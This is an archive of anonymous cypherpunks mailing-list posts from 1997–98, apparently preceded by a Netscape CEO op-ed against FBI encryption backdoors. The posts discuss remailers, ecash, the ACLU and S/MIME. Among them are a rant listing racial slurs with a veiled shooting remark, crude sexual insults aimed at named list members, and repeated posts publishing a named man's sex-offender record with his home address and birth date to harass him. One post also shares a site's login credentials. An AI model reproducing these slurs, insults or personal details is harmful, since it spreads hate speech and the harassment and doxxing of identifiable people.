Protecting this valuable information has become a highly competitive business around the globe, yet U.S. industry has been limited in how it can compete, because U.S.-based companies are not allowed to export anything stronger than 40-bit (or in some cases 56-bit) encryption. (The strength of encryption is largely a function of the length of its software "keys" measured in bits, the zeros and ones that comprise computer data.) Foreign producers, however, can distribute encryption products with 128-bit key length, so-called strong encryption, which is considered unbreakable by today's computing standards.
The FBI has proposed to worsen this situation by also limiting the use of strong encryption in our domestic market. The FBI's proposal, in the form of the Oxley-Manton amendment to a House bill originally drafted to liberalize export controls on encryption, would require makers of encryption software to provide the government with immediate access to the information in a computer or network without the knowledge of the owner or user of the computer. We could still provide encryption products, but their value would be compromised considerably by a "backdoor" for law enforcement agencies to access information in the computer.
We understand and share the FBI's concern about terrorists and other criminals using encryption to protect their activities from law enforcement surveillance, but the FBI proposal does not solve the problem. The criminals will still be able to buy advanced encryption technology outside the U.S., where it is freely available today.
The encryption plan will cause bigger problems for law-abiding companies, however. We have some of the best software engineers on the planet at Netscape, but we simply do not believe it is possible to comply with the proposed FBI standard. If it became law, the federal government could put us in jail if we could not guarantee immediate access to data in everyone's computer. This could only result in having us remove valuable information security features from our products. But the Internet needs just the opposite: more security.
As legal scholars have pointed out, the FBI proposal poses grave constitutional concerns. An additional problem is the likely result of the FBI plan: more crime. By taking away encryption as we know it today, the FBI proposal would expose computer users to assault by hackers intent on economic espionage, blackmail and public humiliation. At a recent congressional hearing, one witness testified that with $1 billion and 20 people using existing technology, he could efffectively shut down the nation's information infrastructure, including all computer, phone and banking networks. Another witness said he could do it for $100 million.
The solution is to ensure that our public and private infrastructure is secured through strong encryption and other means. The FBI cannot catch every hacker. But there will be fewer and fewer of them trying to penetrate sensitive networks if those networks are adequately protected and communications secured through the use of strong encryption.
Without the privacy and security that strong encryption guarantees, consumers and businesses will refrain from using the Internet, greatly damaging our economy. The Internet already contributes 1.5% to the U.S. gross national product. Estimates suggest the total value of goods and services traded over the Internet could reach $8 billion this year and $330 billion in five years. The U.S. holds an estimated 75% of the global software market and roughtly the same share of the global Internet economy, according to studies by the Global Internet Project, an international trade group.
The FBI proposal, if adopted, could end this economic phenomenon overnight. The good news is that the House Commerce Committee voted against this proposal by 35-16 on Wednesday. However, similar amendments have already been approved in the House National Security and Intelligence committees. It's now up to the House Rules Committee-whose charman, Gerald Solomon (R., N.Y.), favors limiting encryption technology-to reconcile the votes of the five committees that have considered various forms of the bill. Perhaps most ominously, the Drug Enforcement Administration and the deputy Treasury secretary for financial crimes yesterday announced their support for the FBI's proposal.
What we need instead is a voluntary approach, U.S. companies should continue to cooperate with law enforcement authorities in provideing technological expertise and emergency assistance. Because companies like mine are committed to dooing this, our country will be more secure. If government policies end our leadership in encryption technology, where will our law enforcement and national security officials turn for help?
Mr. Barksdale is president and CEO of Netscape Communications Corp.

@_date: 1997-09-27 04:53:49
@_author: Anonymous 
@_subject: Plea from a parent who wants to keep their kid free of SSNs 
This slur is unwarranted.  The ACLU has a long tradition of defending
religious rights, even those of Christians.
My personal favorite is the case of the Jehovah's Witnesses in the
1950s.  The Witnesses believe that they cannot honestly pledge
allegiance to the flag.  They believe that they owe allegiance to God.
Were the government to act in a way that was other than God's
intention, they would be unable to cooperate.
This had to go all the way to the Supreme Court and it was the ACLU
that did it when nobody else would.
Be my guest to criticize the ACLU, but you'd do better to pick one of
their weak points.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-09-27 06:34:09
@_author: Anonymous 
@_subject: In response to Declan's questions about crypto.com 
Jonah Seiger didn't have any better sense than to write:
   ARE YOU FUCKING CRAZY!!!!????!!!!????
  Do you remember the NRA? You know, the organization that used to refuse to compromise on defending the Constitution?
  Well, they decided to play DC's game, and now they are nothing more
than a bunch of lame fucks who spend their time trying to explain to
their dwindling membership that people with half-a-brain and a modicum
of common sense need to give up their right to self-defense so that
brainless retards won't get murdered with their own guns.
  Louis Freeh wants cryptographers' nuts and the CDT wants to tell us
that giving him *one* nut is "a step forward."
NEWS FLASH FOR THE LAME FUCKS AT CDT!!!!
The Constitution and the Bill of Rights *do*not* end with the words:
  "...just kidding!"
  "...unless it's too much trouble."
  "...except for drug dealers, pedophiles, pornographers and
  "...except for niggers, spics, wops and kikes."
  "...except for women."
  "...except for communists."
  "...except for Dr. Dimitri Vulis, KOTM."
  "...unless the 'legitimate needs of law enforcement' necessitate the
  abandonment and/or abrogation of all basic human rights."
  "...up until the time comes when people purporting to defend basic
  human rights guaranteed under the Constitution decide to support the
  compromise of the rights of others."
 > That's why we have described the vote on cryto.com as a "vote in
favor of
  Declan's criticism does not *need* clarifying.
  What needs clarifying is how CDT and it's bum-buddy organizations can
possibly claim to justify the turning of 'rights' into 'privleges' which
can then be revoked by those who claim to 'grant' them.
  Is CDT going to desribe the vote for the law allowing the citizens of
the US to take 'reasonable' breathes of air as "a vote in favor of
  Do us all a favor and stand next to the lawyers so that Shakespeare
doesn't have to waste bullets when people of reason get tired of letting the lame fucks rule the planet.
Toto (posting anonymously)

@_date: 1997-09-27 06:42:35
@_author: Anonymous 
@_subject: We're in BIG trouble now! / Re: CDT complains to my editors after post to cypherpunks 
Shit!
  The Graham-John Bullers autobot has learned how to think in a
rudimentary fashion that allows it to respond to posts in a manner
that comes close to imitating rational thought.
  How long, I ask you, until it decides to run for President?
Igor (posting anonymously)

@_date: 1997-09-27 08:44:17
@_author: Anonymous 
@_subject: Plea from a parent who wants to keep their kid free of SSNs 
The ACLU can be fairly criticized for their general sympathy to the
causes of the Democratic Party.  This would be acceptable if they were
honest about it, but they are not.
Likewise, while they may have no official position on the 2nd
amendment, you will generally find members of the organization are
staunchly opposed to it.  Again, no real tragedy except that their
advertising proclaims their organization is the only one in the United
States devoted to protecting the Bill of Rights.  Unfortunately, it
just isn't true.  They protect the amendments they like and ignore or,
in the case of the 2nd amendment, undermine the rest.
Most people probably don't know how the ACLU is structured.  There is
a national organization and then a variety of state level chapters
which have a great deal of autonomy.  The chapters do a lot of the day
to day work helping people who are getting severely screwed by their
local governments.  (There was a great case about ten years ago
involving a state sponsored alcohol rehabilitation program.  Once in,
it was understood that participants wouldn't be allowed to leave for
about 60 days so they could really dry out.  It seems there was a
little funding program and the facilities provided couldn't handle all
the people who applied.  So, they threw a bunch of the women in jail!
The ACLU chapters handle cases like this all the time.  They don't get
much credit for it and nobody else does much of this work.)
However, the chapters tend to be a little more squirrely than the
national organization.  Usually when you hear about some flaky case
"The ACLU" was pushing, it will turn out that a chapter was behind it.
About five years ago the Southern California chapter campaigned
against California Proposition 165 because it would cut welfare
benefits.  A friend and ACLU member complained that this was not a
civil liberties issue and they should not be campaigning for the
Democratic Party.
This letter came back:
While the ACLU is great in certain ways, so far as most cypherpunks
are concerned I recommend considering them to be uncertain allies.
It's sad.  If they were truly a multi-partisan organization which was
devoted to the Bill of Rights they would be many times more effective
than they are currently.  In principle there is no reason why the NRA
and the ACLU shouldn't be the same organization except the membership
of each brings too much baggage to the table.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-09-28 08:03:30
@_author: Anonymous 
@_subject: Remailer Attack (fwd) 
See also the CDA.  Yes, parts are still in effect, including provisions giving
immunity to interactive services if material was provided by someone
else.  Conceivably this could apply to remailers, if they could call themselves
interactive services.  Certainly the material they send was not provided by

@_date: 1997-09-28 08:52:03
@_author: Anonymous 
@_subject: No Subject 
Paul "Fatman" Bradley writes :
We didn't miss you, you going reduced the noise level.  Glad to see
you're going again.
I can't imagine that anyone on this list will be calling you?
Delusions of self importance?
Don't hurry back!

@_date: 1997-09-29 04:38:39
@_author: Anonymous 
@_subject: Remailers and ecash 
1. You should be looking at the marginal cost of adding money
collection to a remailer.  It isn't fifty thousand dollars, it's
calling Mark Twain Bank, downloading the ecash software, getting it
set up, and then hooking it into your remailer.  (This would be a good
way for the EFF to collect donations, wouldn't it?)
2. Remember that this could be started as a side business by somebody
who has already paid the fixed costs.
3. $50,000 is nothing for a high tech venture, anyway.  If there is
any indication that security services could be a real market, the
investment money will flow like tap water.  (People love web
businesses that are really generating hard cash.)
When I look at Raph's statistics I don't see a successful remailer
network.  Now, there is some question about what his numbers mean, and
there are some questions about the causes, but it is believed (not
just by me) that the remailers lose messages and that they are delayed
by reasons other than waiting for reordering queues to fill up.
Yesterday, I think you said that if you noticed a problem with your
remailer at 1am, you would deal with it in the morning.  You are a
volunteer and that is perfectly reasonable.  But, if your remailer was
related to a flow of cash, you might find it worthwhile to stay up
another 30 minutes.
Also, there are really only a few remailers out there.  If there was a
market in place, we would see some more entrants, both as service
providers and as customers.  There are lots of people out there who
would be delighted to operate a remailer for $5000/year.
It's a great product.  You haven't lived until you've e-mailed money.
I don't think you have to pay this fee with every account.  (Even if
there is a $10 fee, I would think my $50 would help defray the
The way it works (in e-mail) is you generate a block of ASCII text
that looks sort of like a PGP message and give it to the person you
want to pay.  You can make the payment out to them in particular, or
you can make it out to whoever takes the certificate to the bank
For ease of use, remailers should use the latter method.  This also
means that you wouldn't have to have a merchant account (which might
be more expensive) to accept cash with your remailer.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-09-29 05:30:41
@_author: Anonymous 
@_subject: Remailers and ecash 
Good point.  I appreciated the following detailed discussion.  But, I
disagree on a few points.
An economist was walking down the street and saw a hundred dollar
bill.  The engineer with him snapped it up.  Later, the engineer asked
why his friend hadn't taken the money.  "Well, the economist
explained, I knew that it couldn't really be there because if it was,
somebody would have gotten it."
Think of ecash as "remailer credits", only somebody else has gone to
the trouble of solving all of the hard problems (including
infrastructure), and you can get remailer credits by doing any
productive activity for anybody in the world who will pay you in
dollars.  Some people will get ecash (i.e., "remailer credits") by
running remailers.  Others will get it by working for Microsoft and
converting part of their income to ecash.
Ecash suits the bill perfectly and it is available and working right
now.  It is actually easier to use ecash than to write some sort of
"remailer credit" system from scratch.
Again, there seems to be this idea that it's hard to get set up using
ecash.  If it were, long discussions about how likely it would be to
work with the remailers might be worthwhile.
But, the fact is, it isn't hard to get a remailer to accept ecash.
So, we should get a bunch of remailers accepting it and see how things
It should also be quite easy to modify existing client software to put
ecash into chained messages.
Consider premail.  Raph would have to add a keyword to his remailer
description table which means "accepts 25 cents ecash".
Premail could have a command line option to add ecash.
The ecash itself could come from a file of blocks of ASCII ecash made
out to cash, which are automatically clipped by premail and then
pasted into the message.  Easy, right?  Nobody even has to interact
with the ecash application from the program.
So where do these files full of blocks of ASCII ecash going to come
from?  People with ecash accounts can generate them by hand or by
having a program call the ecash software to generate them.  Then they
can give or sell them to their less fortunate friends who don't have
an ecash account.
If you don't use up all the ecash ASCII blocks, they can be
It's that easy.  It will work.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-09-29 10:44:18
@_author: Anonymous 
@_subject: Message 
Try to keep in mind that that is how the government plays the game, here and elsewhere. Even in countries that have laws
against irritating the government a hip regime always now tries
to prosecute for only semi-related or even completely unrelated
"crimes." Maybe you, too, could be found to have engaged in
juvenile activities like ordering noxious substances, much to your surprise and horror, after calling attention to yourself in a way that touches a sensitive spot on the body bureaucratic.
Although Bell might in fact be a complete idiot and have given
them the levers they needed to destroy him, it would be a grave mistake to assume that there is any truth at all to the
charges. This is political prosecution a la 1997 in the land of
the Freeh, home of the slave. In this climate the risk of expressing any opinion that touches government's hot buttons is
that you will be investigated. Being investigated can easily
ruin you, being charged almost certainly will -- both pre-trial punishments that make a mockery of the entire set of constitutional
protections against prosecutorial and judicial abuses. The modern
equivalent of the Crown's former ability to target someone with
a law is the ability of the government to mine a rich cache of
laws for the one that can circumstantially be applied to the
victim. The odd thing that works in their favor is that anyone
who practices as he preaches is more likely than others to have
vulnerabilities of the sort government looks for when targetting
him. It's one of those things that provides the black hats with
a heavy strategic advantage. Not that they're satisfied with that, of course. They'll use it, but they'll also black bag you,
maybe send in some orders in your name to chemical supply houses,
whatever it takes once you get on their list.

@_date: 1997-09-29 12:42:05
@_author: Anonymous 
@_subject: NoneRe: Remailers and ecash 
This is exactly what is happening.  In fact one ISP mentioned recently on
this list keeps alt.anonymous.messages traffic for an extended period of
time for their customers.
On a more practical note, if the user downloads all the messages, or uses
secret-sharing techniques, the ISP can sell accounts using non-anonymous
payment methods and not know which users are receiving which messages.
No blind ecash needed.

@_date: 1997-09-29 17:16:15
@_author: Anonymous 
@_subject: quote 
Jerk! You don't have the slightest clue about what is going
on over here, do you?

@_date: 1997-09-30 05:58:17
@_author: Anonymous 
@_subject: Remailers and ecash 
How do you know this?  If the remailer network works properly, you
should not have any knowledge of this at all.
This is like saying we should only encrypt messages which are really
secret.  You should encrypt all of your messages - then nobody can
tell when you have a secret.
If you are arguing that nobody wants their security, I hope you are on
the wrong list.  Many of us have gone to great effort to get some
security and to create tools for other people's security.  It is hard
to believe that it's worth a few nickels and dimes to us to expose our
traffic to Big Brother or anybody else.
Only if implemented in a foolish way.
Look, there's no need to say "my remailer is now a cash only remailer
no others need apply".  You can say, "people who pay cash get better
service."  Or even, "people who pay cash have a higher probability
of getting better service."
While I can't speak for the other remailer users, I certainly have no
problem shoving a little money towards the remailers.  Like many who
read this list, I am not poor.  I would like to be able to help defray
the expense of my traffic.  Hopefully other cypherpunks with jobs will
feel the same way.
The important thing is to get things rolling.  Are the remailer
operators going to get rich overnight?  Maybe not.  But we can
definitely get some market activity going and start generating some
real remailer traffic.
Let me now note that this dialogue has been somewhat surreal.  Am I
really begging the cypherpunks to use ecash?
It's a good idea to get ecash in now because it will be harder to
incorporate payment methods later when there is more infrastructure to
change.  (Look at the mixmaster problem.  It can't (according to
Lucky) be used for ecash without modification.)
However, it appears that part of the problem with the remailers is
that nobody uses them.  We should be making a concerted effort to do
so, and not just for cpunk traffic.  We should use them for
everything.  It won't take that many people to reduce the message
delays substantially.  It will also advertise the remailer network to
our friends who may not yet be cypherpunks.
The tools exist to do this.
It is somewhat ironic that we complain that Joe Sixpack won't use
tools that we will not (or even cannot) use ourselves.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-09-30 19:12:14
@_author: Anonymous 
@_subject: ElGamal 
Timothy C[reep] May carries a turd in his wallet for identification purposes.
            \|/
           (*,*) Timothy C[reep] May
          _m_-_m_

@_date: 1997-10-01 05:16:36
@_author: Anonymous 
@_subject: Remailers and ecash (fwd) 
Avoiding spam.  Anyone who doesn't use remailers is sure to get their
mailbox full of crap.
Employment related concerns.  I know of many people on this list who
have had problems along these lines.
The rest of your comment is utterly stupid.  How many people do you
know who use remailers to launder money?  Zero, I'd bet.  You need to
spend a little less time listening to mindless political rants and more
time observing the real world.

@_date: 1998-04-02 21:14:15
@_author: Anonymous 
@_subject: V-Chip Reruns... 
A member of Peacefire ( who has volunteered to pull the Fire Alarm at a White House To Be Named
Later, on April 19th, at 9:02 a.m., forwarded:
[In honor of April Fool's Day, the following message about a "V-Chip
for books" was first posted on the Internet two years ago on April 1,
During that time, Internet censorship was a national concern after the
passing of the Communications Decency Act, and censorship systems for
the Internet, like the V-Chip for television, were just starting to gain public attention.  The news of a "V-Chip for books" was met with an outpouring of support from some parents who apparently didn't recognize it as a joke.]
[Forwarder's Note: There was also a great outpouring of support for  the gentleman who began the non-profit society promoting the clothing
 of animals, to cover their 'private parts.' While fools like yourself
 'work for a living,' eh?]
News Release -- April 1st, 1996
        V-chip rating system extended to books
                CLA endorses 'V-barcode' plan
The Canadian Library Association today announced its
intention to comply with the wishes of millions of
Canadians who had signed a petition decrying the increasing
presence of "vivid imagery of sex and violence" in books
targetted at children.
"Once my daughter started reading books in the 'Goose Bumps'
series", says one concerned parent, "reading became like an
addiction to her."  Even though the books were so violent and
scary the girl had nightmares.  "Soon she started reading beyond
her grade level and was getting into books with 'adult themes'."
The problem, say most busy parents, is that kids can visit
the local library and borrow anything they choose, regardless
of their family's values.
The new book rating system, modelled after television's highly
successful V-chip, has been dubbed the V-barcode, because each
book will have a machine-readable "barcode" on the spine that
encodes a rating of the book's contents on several scales:
sex, violence, coarse language, drug use, religion, and
'alternative lifestyles'.
"This isn't about censorship", says Keith Spicer, who recently
joined the CLA as policy director after leaving the CRTC, "this
is about choice, ... about empowering parents to make choices."
Under the new system, parents will select their family's
"tolerance levels" on each scale.  These are encoded as a barcode
on their child's library card.  When a child wants to borrow a
book, the librarian simply passes the library card and book over
a scanner (just like the ones used in the supermarket) and
a screen instantly displays whether authorization should
be granted.  "It's a marvel of technology", bubbles Spicer,
"it's just like the child's parent is there, saying to the child

@_date: 1998-04-04 03:24:12
@_author: Anonymous 
@_subject: ROTFL! 
Do any of you cocksuckers know where the following comes from?  URL?
A shit-eating grin spread across Dr. Vulis' face as he realized that, this
time, he had been caught for doing something he wouldn't be punished for.
Rewarded, perhaps?
Cautiously, Dr. Vulis asked Igor, "So can I have more medication? All of the
others in treatment here are getting better drugs than me, because they are
patients being treated by doctors. Why am I the only doctor being treated by
a patient?"
"Now Dimitri," Igor shook his head, negatively, "you are exaggerating again.
You know that John Young and Robert Hettinga are the only two here who are
getting better drugs than you, and it is only occasionally, when they share
a room, and then only in order to increase their pleasure when they engage
inuuhhhCypherPunk activities."
Dimitri got angry, as Igor knew would result from feeding his fantasies, "I
know what you're talking about!" Dimitri always gotuuhhh'excited', when
this subject came up.
"They're sucking each other's cocks! This place is full of cocksuckers, and
the biggest one of all is cocksucker John  Gilmore !"

@_date: 1998-04-05 10:05:20
@_author: Anonymous 
@_subject: No Subject 
"Perhaps the most defining feature of the CypherPunks was that they strove
to 'walk their talk', as the saying was in those days. While they decried
the increasing infringement of central authority on the freedom and privacy
of the individual, which was near its zenith at that point in time, they
chose to fight for the right to be self-willed, rather than to impose their
will and beliefs on others.
"Instead of concentrating their efforts on forcing the authorities to acting
rightly, in the interests of freedom and privacy, they focused on routing
around the impositions and infringements that the governments and dark
forces of that era enacted to try to contain them.
"John Gilmore, one of the CypherPunks founders, often said, 'The InterNet
interprets censorship as damage, and routes around it.' Very Taoist." Bubba
Jonathan spoke softly, quoting a section of the Tao Te Ching which had been
a particular favorite of his grandfathers,
"A man of Virtue performs his part,
"But a man without Virtue requires others to fulfill their obligations.
"The Tao of heaven is impartial.
"It stays with good men all the time."

@_date: 1998-04-05 22:11:49
@_author: Anonymous 
@_subject: Gao Chaos Cypher 
METHOD AND APPARATUS FOR ENCRYPTING AND DECRYPTING INFORMATION USING A DIGITAL CHAOS SIGNAL
Patent Number: 5,696,826 Date of Patent:Dec 9, 1997 Inventor: Zhenyu Gao Appl No:488,088 Field:Jun 7,1995

@_date: 1998-04-06 03:02:10
@_author: Anonymous 
@_subject: Password For No Bullshit Sex Site 
This is an honest to god ma and pa run sex site as far as I can tell.
I didnt get a million UCEs after requesting their password.
The following legal warning is sent with EVERY username/password that we
out, (as this little note will now be), and is not written specifically
you, but as a general warning for everyone, so please don't write back and
it personally. This is our way of further protecting ourselves legally,
without using an AVS or Credit Card Number. The username and password ARE
contained in the body of the letter which follows this warning.
This letter is NOT SPAM! It is being sent to you at YOUR OWN REQUEST. If you
did not request this letter,
then someone else using your e-mail account or posing as you, most certainly
did. Please reply immediately if you suspect someone else is fraudently
accessing your mail account, so that we can contact the proper authorities
the headers of the original email, and add you to our mail filters so that
further mail sent from your address will immediately be discarded, and you
will NEVER receive a password from us again. We repeat, THIS INFORMATION WAS
NOT SENT UNSOLICITED!
DO NOT EVEN READ THIS LETTER IF YOU ARE NOT OF LEGAL AGE TO VIEW ADULT
MATERIALS IN YOUR COMMUNITY!
By requesting, reading and acting upon this letter, you have sworn that you
of legal age to view said material and would not be breaking any of the
laws of
your community. In most areas of the USA the legal age for access to adult
materials is either 18 or 21. You MUST know the law for your area! YOU are
responsible for your own actions. If someone using this email account
to gain access to our site by hacking a fraudulent account, we will be
to file charges. Please help us keep the internet safe and free by honoring
our request to make certain that it is legal for you to view hardcore adult
materials. Our only alternative to counting on your honesty is to take our
site to credit card only access. We don't want to do that if we don't have
so please be honest with us and keep the net free for everyone. Thank you
Hi there, Mr. and Mrs. Hackula here...
Thank you for your help.
Please don't bookmark our picture pages, as they are subject to change.
You can always access our site through:
 OR
And while you're there, please check out our sponsors, because they
are the one's who are now keeping us free, instead of us having to use an
AVS or making our site a pay-site. Even our sponsors offer a whole month
completely free. :)
HERE IS THE CURRENT USERNAME AND PASSWORD FOR OUR HOMEPAGE.
Username: lazlosnerd
Password: nitrocola
To enter these passwords, you must first click the link on our page that
says, "Come on in for some Milk and Cookies." You will then see a box
requesting the un/pw. Enter the words exactly as they appear here... No
capital letters. Please save this email, or if you write down the un/pw,
make sure you spell them correctly.
Please remember not to give these to anyone else. Please do not publish
them anywhere, and please inform us if you find them published somewhere
on the web, or you find a page that links PAST our password request page...
Thank you for your cooperation!
Mr. and Mrs. Hackula

@_date: 1998-04-07 12:04:47
@_author: Anonymous 
@_subject: Is Privacy-hater Gary Burnore a Sex Offender? 
I just found this posted to usenet.  Can anyone in NC verify it?
Newsgroups:   triangle.general
Looking through the new NC Sex Offender Registry, who did I see?
   GARY LEE BURNORE
   4201 BLAND ROAD APT J
   RALEIGH NC 27609
Offense and Conviction Information:
   Conviction Date: 03-13-1997
   NC Statute: 14-202.1 - INDECENT LIBERTY MINOR
   Sentence Imposed: PROBATION 3Y
   Court County: SANTA CLARA, CA
Two questions:
   1-Is this the same jerk who posts regularly to triangle.general?
   2-If so: anyone know anything else about this conviction?

@_date: 1998-04-07 13:52:13
@_author: Anonymous 
@_subject: Stan is Nobody's Friend? 
In a message dated 4/7/98 2:26:38 PM Central Daylight Time, nobody at REPLAY.COM
<< From:         tsatan at hotmail.com >>
I would read that as - T(he)Satan at HOTmail.com if I were you! ;-)  I think he
thinks he's serious. (a reminder - IMHO, the Christian Coalition is the anti-
Christ in disguise)
Stan, somebody needs to pry your cocksucking lips off of Pat robertson's cock long enough to beat your stupid fucking ass down with a clue-by-four.
stop swallowing all that mainstream media jizz, you
fucking cumbucket, and quit the dope too.
your daddy

@_date: 1998-04-08 09:09:13
@_author: Anonymous 
@_subject: IMPORTANT: Gary L. Burnore is a Sex Offender! 
I visited the  website, did a search for
"Gary Burnore", and the story is confirmed.  If it were a "load of
bullshit", I suspect that Gary would have had it hauled away by now.
There's even a mugshot there.  Gary Burnore, of course, is welcome to
post his side of the story if he cares to.
The date listed for his conviction is about the same time that Gary Burnore
was whining about some "anon asshole" whom he alleged had falsely accused
him of molesting his live-in girlfriend's teenage daughter.  She lived --
guess where -- in Santa Clara, CA.  It looks like Gary's rampage to get a
couple of anonymous remailers shut down for spreading "libel" was bogus.
If a story is true, it isn't libel.  And when he couldn't get them to censor
embarassing posts to usenet, the made-to-order "spam baiting" mysteriously
appeared, and finally finished the job.  Just a coincidence, I suppose...
Let me guess -- this "conspiracy" to make Gary Burnore look bad has now
infiltrated the Santa Clara Police Dept., the San Francisco Police Dept.,
and the North Carolina attorney general's office?
By definition, Gary Burnore is innocent of ANYTHING he's accused of. And since this is the same Gary Burnore who was so adamant that posting
publicly-available information to usenet was acceptable:
   Registration Status: Registered
   Possible Violations: None Reported
   BURNORE,GARY LEE    Alias Names:
   BURNORE,GARY LEE
                                         Photo Date: 08-27-1997
                                              SRN: 001693S3
   Reported Date: 12-16-1997 Address Verified: NO
   Street: 4201 BLAND ROAD APT J
   City: RALEIGH State: NC Zip: 27609 County: WAKE
   Race: W Sex: M Height: 5'08" Weight: 170 LBS. Hair: BRO Eyes: BLU
   Birth Date(s): 10-13-1957
   Scars, marks, tattoos:    State ID  FBI  Dept. Corr.     Contact County: WAKE Registration Date: 08-27-1997
   Conviction Date: 03-13-1997 Release Date:    NC Statute: 14-202.1 - INDECENT LIBERTY MINOR
   Sentence Imposed: PROBATION: 3Y
   Court County: - SANTA CLARA, CA
   Reported Date: 08-27-1997 Address Verified: NO
   Street: 4201 BLAND ROAD
   City: RALEIGH State: NC Zip: 27609 County: WAKE

@_date: 1998-04-10 00:52:36
@_author: Anonymous 
@_subject: Is this for REAL? 
OFFICIAL RCMP HATEMAILER
"Police physicians still slap newborn babies on their
soft little bottoms because they know that this new
little citizen will eventually be guilty of _something_!"
This message is NOT from from some namby-pamby, pacifist
citizen who bitches and whines every time that Canada
hosts foreign dictators who know how to keep their
citizens in line (to conserve the firing squad's
bullets).  It was remailed by *real* men and women who have the
guts to make citizens *pay* for attempting to draw
attention to non-official viewpoints and values by assaulting them with potentially deadly toxix
Send all complaints and requests for blocking to:

@_date: 1998-04-12 21:43:17
@_author: Anonymous 
@_subject: S/MIME Freeware Library (SFL) 
The S/MIME Freeware Library (SFL) is a reference implementation of the IETF
S/MIME v3 CMS and ESS I-Ds. All source code for the SFL will be provided at
no cost and with no limitations regarding its use and distribution.
Organizations will be able to use the SFL without paying any royalties or
licensing fees.  J.G. Van Dyke and Associates, Inc, (VDA) is developing the
SFL under contract to the US Government. Draft versions of the SFL Fact Sheet, Software Design Description (SDD) and
Application Programming Interface (API) documents (including SFL header
files) are now available.  The Internet Mail Consortium (IMC) has
established an SFL web page at  which includes
links to the SFL documents stored on the VDA web site
(  The IMC has also
established an SFL mail list which will be used to: distribute information
regarding SFL releases; discuss SFL-related issues; and provide a means for
SFL users to provide feedback, comments, bug reports, etc.  Please note that
all SFL-related discussion should occur on the imc-sfl mail list and not the
ietf-smime mail list.  Subscription information for the imc-sfl mailing list
is at the IMC Web site listed above.
An incomplete, "interim release" of the SFL software will be available by 31
Mar 98.  Further releases will be provided as significant capabilities are
added.  The target for completion of the SFL is June 1998. The stability of
the S/MIME v3 set of specifications is a prerequisite for meeting this
delivery goal.
The SFL is composed of a high-level library that performs generic CMS and
ESS processing independent of the crypto algorithms used to protect a
specific object.  The SFL high-level library makes calls to an
algorithm-independent Crypto Token Interface API.  The underlying, external
crypto token libraries will not be distributed as part of the SFL source
code.  The application developer will independently obtain these libraries
and then link them with the SFL.  This strategy will allow the SFL source
code to be freely distributed to the entire Internet community because it
does not contain software that directly implements any crypto algorithms
that are copyrighted or export controlled. IMC plans to add Web links pointing to freeware and commercial crypto
libraries that are compatible with SFL as they become available.

@_date: 1998-04-15 00:14:56
@_author: Anonymous 
@_subject: Once upon a time... 
...there was an invisible Dragon who was afraid to breathe fire upon
a Cocksucker who thought he was a Prince, until the Dragon could be
certain that the fairy tale would only be told by those who had learned
to fear the Dragon.
  The Dragon intercepted the Cocksucker Prince's messages and broke
open their seals, in order to search for dirt underneath the fingernails
of the writer that may have fallen into the envelope, and use it to
denigrate his character among those who clean underneath their own
fingernails before flossing at the same time every day.
  The Dragon stole the Cocksucker Prince's writing instruments and
held his couriers hostage, in order to prevent him from completing
his messages to children who still wet their bed, and explain that
when they got tired of pissing all over themselves, that they not
only had the option of pissing up the ass of the monster that was
hiding under their bed, but could also piss in the monster's ear.
  The Dragon did this because pissing up the monster's ass was a
felony, and pissing in the monster's ear was only a misdemeanor.
  The Dragon was a slow-reader and didn't understand that those who
fail to learn from the Cocksucker Prince's fairy tale past are doomed
to repeat it...

@_date: 1998-04-15 00:42:02
@_author: Anonymous 
@_subject: Conspiracy Rumors! 
Rumor has it that Ted Kaczynski was only offered his life-saving
plea bargain after your appearance in the Bay Area and your subsequent
email to Slick Willie offering to fill in for terrible ted in his
  Another rumor makes much of the fact that Netscape only backed off of
their anti-trust attack on Microsoft and went back to their roots,
providing source code to those battling against the micromonster, after
you dumped their browser in favor of billybeast's exploiter program.
  Other rumors make much of the fact that the Anthrax Twins were arrested shortly after you left Las Vegas and met with the guitar
player for Linda Lou & the Drifters, who just happens to do the
electrical work for the Biosphere project outside of Tucson...a perfect environment for researching biological warfare delivery

@_date: 1998-04-15 01:46:13
@_author: Anonymous 
@_subject: GSM cellphones cloned---Threats? 
Do you have a phone number?
Is that 10 grand plus expenses?
Just wondering.

@_date: 1998-04-15 12:10:17
@_author: Anonymous 
@_subject: Gary L. Burnore, Registered Sex Offender in Raleigh, NC 
Actually Gary Burnore's original beef was with an anonymous whistleblower
who notified the victim's mother and school officials of Gary's pedophelia
before he was ever arrested for it.  (How would a mere troublemaker out to
allegedly "harass" poor Gary have even known about Gary's sexual exploits
before they became public?  And how would he/she have known the identity of
the victim which is still non-public information?)  Back then he was
accusing the poster of "libelling" him and "harassing" the victim.  The
situation only became public when Gary chose to publicly accuse an
anonymous usenet poster of being the same person who had sent the private
e-mails which tipped off the victim's mother and high school principal.
Unable to track down the whistleblower and subject him/her to the typical
DataBasix sort of harassment, he attacked the remailer that was being used,
instead.  See:
  And, yes, one of Gary's forms of harassment against another person was to
dig up a 10 year old tax lien on the individual and post it to usenet in an
attempt to embarass him and intimidate him into silence with the threat
"there more where that came from".  See:
  When the victim's mother evicted Gary Burnore from her home and eventually
advertised for a new roomate in the ba.market.housing NG back on 5/8/97,
someone made a followup remark on 6/5/97 which said:
  "XXXXX finally booted her pedophile boyfriend, Gary L. Burnore, out of the
   house!  Last I heard, he was high tailing it for Raleigh, NC."
Note that this was well before Gary ever registered as a sex offender in
NC.  Gary, never able to able to leave well enough alone, just had to
follow up on the post, even though he has wisely chosen to have DejaNews
delete his reply.  I'm wondering if Gary is worried that someone will
expose the fact that his girlfriend with whom he was living and sleeping
and whose daughter he molested was also a high-ranking official at a public
television station which did business with Gary L.  Burnore's company
DataBasix.  Was that conflict of interest ever disclosed?
And since this is the same Gary Lee Burnore who used to confidently declare
"I have nothing to hide", I guess it was assumed he wouldn't mind if the
truth about him and his sexual quirks were revealed using publicly-available
records posted on a public website by the state of North Carolina.
And, no, I'm not any of the individuals named above.
Careful, Gary.  False accusations of libel might just motivate some people
to prove that the allegedly libellous statement were, in fact, true.  You
apparently bluffed and lost.

@_date: 1998-04-15 23:43:06
@_author: Anonymous 
@_subject: BioInfoWarFare? / Re: sorry 
Sounds like a biological agraphia warfare attack, followed by a logic
Hhmmm...I smell a Platypus?

@_date: 1998-04-15 23:45:19
@_author: Anonymous 
@_subject: Hackworth 
AN AMBUSHED MARINE
